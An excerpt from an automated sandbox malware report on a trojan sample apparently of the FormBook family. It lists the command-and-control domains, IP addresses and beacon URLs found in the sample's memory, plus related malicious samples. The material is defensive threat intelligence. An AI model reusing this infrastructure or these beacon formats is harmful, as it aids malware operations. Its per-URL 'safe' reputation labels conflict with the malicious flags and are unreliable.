          http://www.txglobedev.com/dy13/0%Avira URL Cloudsafe
          http://www.tyupok.xyz/dy13/www.cpuk-finance.com0%Avira URL Cloudsafe
          http://www.cpuk-finance.com/dy13/0%Avira URL Cloudsafe
          http://www.nearmeacupuncture.comReferer:0%Avira URL Cloudsafe
          http://www.serco2020.com0%Avira URL Cloudsafe
          http://www.nestormediaproduction.com/dy13/www.bum-arch.com0%Avira URL Cloudsafe
          http://crl.v0%Avira URL Cloudsafe
          www.cpuk-finance.com/dy13/0%Avira URL Cloudsafe
          http://www.whysco.comReferer:0%Avira URL Cloudsafe
          http://www.mrwine.xyz/dy13/www.cioncarp4213.com0%Avira URL Cloudsafe
          http://www.txglobedev.com0%Avira URL Cloudsafe
          http://www.cfuhtkwo.xyz/dy13/www.tyupok.xyz0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.cfuhtkwo.xyz
          		154.204.100.23
          		truetrue
            		unknown
            www.mrwine.xyz
            		3.64.163.50
            		truetrue
              		unknown
              www.520yhy.com
              		103.8.70.95
              		truetrue
                		unknown
                winter.qnwoocaijo.com
                		216.83.55.173
                		truetrue
                  		unknown
                  www.serco2020.com
                  		103.224.212.213
                  		truetrue
                    		unknown
                    www.txglobedev.com
                    		188.114.97.3
                    		truetrue
                      		unknown
                      www.cpuk-finance.com
                      		185.151.30.212
                      		truetrue
                        		unknown
                        www.whysco.com
                        		91.195.240.123
                        		truetrue
                          		unknown
                          ext-sq.squarespace.com
                          		198.185.159.144
                          		truetrue
                            		unknown
                            shops.myshopify.com
                            		23.227.38.74
                            		truetrue
                              		unknown
                              021562413z.greycdn.net
                              		128.1.131.130
                              		truetrue
                                		unknown
                                www.cioncarp4213.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.yr8gl32.vip
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.nearmeacupuncture.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.jesuscrewofficial.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.byfchfyr.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          www.cpuk-finance.com/dy13/true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://word.office.comonexplorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.byfchfyr.xyzReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://powerpoint.office.comcemberexplorer.exe, 00000004.00000000.2009295246.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4457096271.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jesuscrewofficial.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.whysco.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://excel.office.comexplorer.exe, 00000004.00000003.3098476432.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3098065936.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4455199777.0000000009C22000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.microexplorer.exe, 00000004.00000000.2006094320.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2007043460.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4454060731.0000000008890000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.yr8gl32.vipexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.520yhy.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nestormediaproduction.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.txglobedev.com/dy13/www.whysco.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.byfchfyr.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cioncarp4213.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.yr8gl32.vip/dy13/www.cfuhtkwo.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cpuk-finance.com/dy13/www.nearmeacupuncture.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.northshorehousekeeping.com/dy13/fexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cpuk-finance.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.yr8gl32.vipReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cfuhtkwo.xyz/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.520yhy.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bum-arch.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cioncarp4213.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nestormediaproduction.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000004.00000002.4457096271.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2009295246.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cpuk-finance.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bum-arch.com/dy13/www.northshorehousekeeping.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.serco2020.com/dy13/www.mrwine.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.whysco.com/dy13/www.jesuscrewofficial.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bum-arch.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://wns.windows.com/)sexplorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.yr8gl32.vip/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nestormediaproduction.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mrwine.xyz/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nearmeacupuncture.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.northshorehousekeeping.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nearmeacupuncture.com/dy13/www.serco2020.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nearmeacupuncture.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mrwine.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tyupok.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.byfchfyr.xyz/dy13/www.txglobedev.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.byfchfyr.xyz/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jesuscrewofficial.com/dy13/www.nestormediaproduction.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cioncarp4213.com/dy13/www.520yhy.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tyupok.xyzReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cfuhtkwo.xyzReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mrwine.xyzReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://outlook.comexplorer.exe, 00000004.00000002.4455199777.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3776759138.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cioncarp4213.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.northshorehousekeeping.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bum-arch.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jesuscrewofficial.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.520yhy.com/dy13/www.byfchfyr.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.520yhy.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.whysco.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tyupok.xyz/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.serco2020.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000000.2005162964.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4452340558.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.cfuhtkwo.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.serco2020.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jesuscrewofficial.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.txglobedev.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.txglobedev.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.northshorehousekeeping.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tyupok.xyz/dy13/www.cpuk-finance.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com/explorer.exe, 00000004.00000000.2007606048.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.serco2020.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cpuk-finance.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nearmeacupuncture.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nestormediaproduction.com/dy13/www.bum-arch.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.whysco.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crl.vexplorer.exe, 00000004.00000002.4449069859.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2002630977.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mrwine.xyz/dy13/www.cioncarp4213.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.txglobedev.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cfuhtkwo.xyz/dy13/www.tyupok.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          198.185.159.144
                                          		ext-sq.squarespace.comUnited States
                                          		53831SQUARESPACEUStrue
                                          103.224.212.213
                                          		www.serco2020.comAustralia
                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                          128.1.131.130
                                          		021562413z.greycdn.netUnited States
                                          		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKtrue
                                          188.114.97.3
                                          		www.txglobedev.comEuropean Union
                                          		13335CLOUDFLARENETUStrue
                                          154.204.100.23
                                          		www.cfuhtkwo.xyzSeychelles
                                          		134705ITACE-AS-APItaceInternationalLimitedHKtrue
                                          216.83.55.173
                                          		winter.qnwoocaijo.comUnited States
                                          		64050BCPL-SGBGPNETGlobalASNSGtrue
                                          3.64.163.50
                                          		www.mrwine.xyzUnited States
                                          		16509AMAZON-02UStrue
                                          185.151.30.212
                                          		www.cpuk-finance.comUnited Kingdom
                                          		48254TWENTYIGBtrue
                                          103.8.70.95
                                          		www.520yhy.comChina
                                          		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1467706
                                          Start date and time:2024-07-04 16:33:04 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 11m 32s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:tYEY1UeurGz0Mjb.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@8/1@13/9
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 126
                                          • Number of non-executed functions: 337
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                          • Report size getting too big, too many NtOpenKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: tYEY1UeurGz0Mjb.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          10:33:49API Interceptor1x Sleep call for process: tYEY1UeurGz0Mjb.exe modified
                                          10:33:57API Interceptor9829049x Sleep call for process: explorer.exe modified
                                          10:34:33API Interceptor8978709x Sleep call for process: wlanext.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          198.185.159.144Orden de compra 0307AR24.exeGet hashmaliciousFormBookBrowse
                                          • www.upcyclecharms.com/md02/?TPXh=Huvb14v0kOWfNfmpMWoBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyszJ9ZVOt8xpVdhjQ==&nHLDZb=8p-HvnKhThQhTxm
                                          Att00173994.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                          • www.2thetcleaningservice.com/mc10/?FPWhWLW=JxJ83Varoc/pDqX/ejTG8SZAK8Thxjdz6WwKL+xsDsFdju7eAxYDUbfmaSdrJy7HwmgH2Kq9Hg==&AlB=8pdT8tsp
                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                          • www.lostaino.com/ts59/?7n=CMI3XAkyIIc+lbzQFM0yBiMxIQj45W/6BGDFfPoe8SD5h+4DN1QfAHIl1f4AVZ60VX6NCS7/mA==&2d8=3fe8kxnx8zVX-2L
                                          INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                          • www.amycostellospeech.com/ps94/?F8LpzZ=Z8xr6Td5qC+h9r+P8xpcNx+5AFGRik/pzejMl2EQ43koTqqLsxs6TtkvjcUWJXi0kPax//YTLQ==&XPa=ABZ4lrqh9bG4uhdP
                                          Att0027592.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • www.bankablebark.com/dy13/?jDHph=9ZSG7Fw6wFJMggGvtga1Qh3mQQl9Rgy3K16+Oe6KY82/n3IrznmlP/WDuEbFz6mxdG1sfeS45g==&Wt=IBZX4leh3ZCl
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          IZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                          • www.nearmeacupuncture.com/dy13/?Rzr=Lbyx94Ip0tNX&alI=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2
                                          103.224.212.213yPURXYpFVuXra2o.exeGet hashmaliciousFormBookBrowse
                                          • www.bolinkpass.club/cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs
                                          Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
                                          • www.vivaness.club/dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp
                                          Solicitud de pedido Documento No 168646080.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
                                          DHL Factura Electronica Pendiente documento No 04BB25083.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
                                          PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
                                          • searchseedphase.online/bot/regex
                                          PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
                                          • searchseedphase.online/bot/regex
                                          Documento de confirmacion de orden de compra OC 1580070060.exeGet hashmaliciousFormBookBrowse
                                          • www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
                                          2024-09C33T37.exeGet hashmaliciousFormBookBrowse
                                          • www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
                                          rBCPcomprobante.exeGet hashmaliciousFormBookBrowse
                                          • www.yassa-hany.online/pz08/?CrFT7j=ftx8Clc09Ned3F&pR-l7PfH=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVQNLhAw6fb
                                          Proforma_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • www.epansion.com/ao65/?BR-hMX=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+a5ltJSnpB6j&Gzu=sFNxH

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.cfuhtkwo.xyzaAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                                          • 154.204.100.23
                                          winter.qnwoocaijo.comlhDCR5RvXwLbWQu.exeGet hashmaliciousFormBookBrowse
                                          • 96.43.100.175
                                          www.520yhy.comaAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                                          • 103.8.70.95
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 103.8.70.95
                                          www.mrwine.xyzkpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 3.64.163.50
                                          www.cpuk-finance.comaAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                                          • 185.151.30.212
                                          mQY9ka5sW6hv2Ri.exeGet hashmaliciousFormBookBrowse
                                          • 185.151.30.212
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 185.151.30.212
                                          lhDCR5RvXwLbWQu.exeGet hashmaliciousFormBookBrowse
                                          • 185.151.30.212
                                          IZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                          • 185.151.30.212
                                          cca9sXT33VsAEdu.exeGet hashmaliciousFormBookBrowse
                                          • 185.151.30.212
                                          www.txglobedev.comIZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                          • 188.114.96.3
                                          ext-sq.squarespace.comOrden de compra 0307AR24.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          Att00173994.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          Att0027592.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
